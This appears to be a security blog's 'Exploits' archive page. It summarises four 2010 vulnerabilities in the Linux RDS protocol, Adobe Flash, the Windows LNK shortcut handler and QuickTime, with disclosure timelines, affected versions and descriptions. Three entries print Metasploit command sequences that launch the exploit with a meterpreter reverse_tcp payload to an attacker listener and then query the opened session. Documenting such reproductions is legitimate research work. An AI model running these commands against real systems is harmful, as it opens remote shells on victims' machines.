Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2010-3904: Linux RDS Protocol Local Privilege Escalation

Exploits,

Timeline :

Vulnerability discovered by Dan Rosenberg
Vulnerability disclosed to the vendor the 2010-10-13
Coordinated vulnerability disclosure the 2010-10-19

PoC provided by :

Dan Rosenberg

Reference(s) :

CVE-2010-3904

Affected version(s) :

Kernel Linux 2.6.30 to 2.6.36-rc8

Tested on Ubuntu 10.04

Description :

On October 13th, VSR identified a vulnerability in the RDS protocol, as implemented in the Linux kernel. Because kernel functions responsible for copying data between kernel and user space failed to verify that a user-provided address actually resided in the user segment, a local attacker could issue specially crafted socket function calls to write abritrary values into kernel memory. By leveraging this capability, it is possible for unprivileged users to escalate privileges to root.

Demonstration :

CVE-2010-1297 : Adobe Flash Player newfunction Invalid Pointer Use

Exploits, Metasploit,

Timeline :

Vulnerability & PoC disclosed by unknown on Exploit-DB the 2010-06-09
Metasploit PoC provided the 2010-06-10

PoC provided by :

unknown
jduck

Reference(s) :

CVE-2010-1297
APSA10-01

Affected version(s) :

Adobe Flash Player 10.0.45.2, 9.0.262, and previous versions for 10.0.x and 9.0.x for Windows, Macintosh, Linux and Solaris.
Adobe Reader and Acrobat 9.3.2, and previous versions 9.x for Windows, Macintosh and UNIX.

Tested on Windows XP SP3

Description :

This module exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due a the hardcoded syscall number.

Commands :

use exploit/windows/browser/adobe_flashplayer_newfun­ction
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-046 : Microsoft Windows Shell LNK Execution

Exploits, Metasploit, ,

Timeline :

Vulnerability discovered exploited in the wild, part of the Stuxnet worm
Metasploit PoC provided the 2010-07-19

PoC provided by :

hdmoore
jduck
B_H

Reference(s) :

CVE-2010-2568
MS10-046

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP1 et Windows Vista SP2
Windows Vista x64 Edition SP1 et Windows Vista x64 Edition SP2
Windows Server 2008 32 et Windows Server 2008 32 SP2
Windows Server 2008 x64 et Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64

Tested on Windows XP SP3

Description :

This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.

Commands :

use windows/browser/ms10_046_shortcut_icon_dllloader
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-1818 : Metasploit _Marshaled_pUnk QuickTime Remote Code Execution

Exploits, Metasploit,

Timeline :

Vulnerability discovered by HBelite and disclosed to ZDI
Vulnerability disclosed by ZDI to the vendor the 2010-06-30
Exploit-DB PoC provided by Ruben Santamarta the 2010-08-30
Metasploit PoC provided the 2010-08-30
Coordinated vulnerability disclosure the 2010-08-31

PoC provided by :

Ruben Santamarta
jduck

Reference(s) :

CVE-2010-1818
ZDI-10-168

Affected version(s) :

Apple QuickTime 7.6.7

Tested on Windows XP SP3 with :

QuickTime 7.6.7
Internet Explorer 8

Description :

This module exploits a memory trust issue in Apple QuickTime 7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX control will treat a supplied parameter as a trusted pointer. It will then use it as a COM-type pUnknown and lead to arbitrary code execution. This exploit utilizes a combination of heap spraying and the QuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions. NOTE: The addresses may need to be adjusted for older versions of QuickTime.

Commands :

use exploit/windows/browser/apple_quicktime_marshaled_punk
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig